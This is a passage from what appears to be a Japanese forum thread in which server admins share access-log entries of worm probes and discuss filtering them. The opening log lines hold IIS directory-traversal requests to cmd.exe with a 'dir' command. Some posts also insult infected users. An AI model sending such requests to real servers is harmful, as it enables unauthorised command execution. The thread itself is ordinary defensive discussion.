/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:00 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:01 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 219.180.88.36 - - [30/Apr/2003:20:46:02 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 215 って最初の219.144.82.204は中国の鯖っぽいな。 アクセスしようとしたら漢字だらけの404が返ってきた。 やふーbbの方はアホなユーザーがワームに感染していることも知らず 繋ぎっ放しにしているのかなぁ・・・ 感染していることすら判断できない、バカユーザがIISを立ち上げていることに疑問を感じるが。 つーか、>119は僅か100程のレスを遡って見る事もできんのか・・・ >>122 すんマソ。良く見たら 殆んど同じような報告がいくつも書かれていた…。 初心者なので変なのが飛んできたことが嬉しくて ついつい書いてしまったのでつた。 こう言うワームの類って、 鯖にセキュリティーホールが無ければ直接害は無いんだよね? しかし大量に飛んでくると ログ作成するのに負荷が掛かるってのがあるか… ルーターでワームだけをカットするような設定は、 簡単には出来るんかなぁ IP指定するのは当然出来るが こうあちこちから飛んでくると切りが無い。 だから、IP弾きは自動化できないって・・・ つーか動的IPや踏み台等を完全場合わけで簡単自動処理できるのがあるなら 教えてもらいたい・・・ なんも考えないでニムダやCodeRedを飛ばしてくるIPをブラックリストに入れると 困る可能性がある。 困ったときには、どこのブラックリストの一部が困ったのかわからないので ブラックリスト自体を消す羽目になる。 以上無理。 IPを弾くのではなく、ワームが送るヘッダーの特徴を検出して削除する ハードウェアルータがあったら良いのにな もちろん検出パターンはメーカーからの自動更新で。 read.cgi ver 07.5.5 2024/06/08 Walang Kapalit ★ | Donguri System Team 5ちゃんねる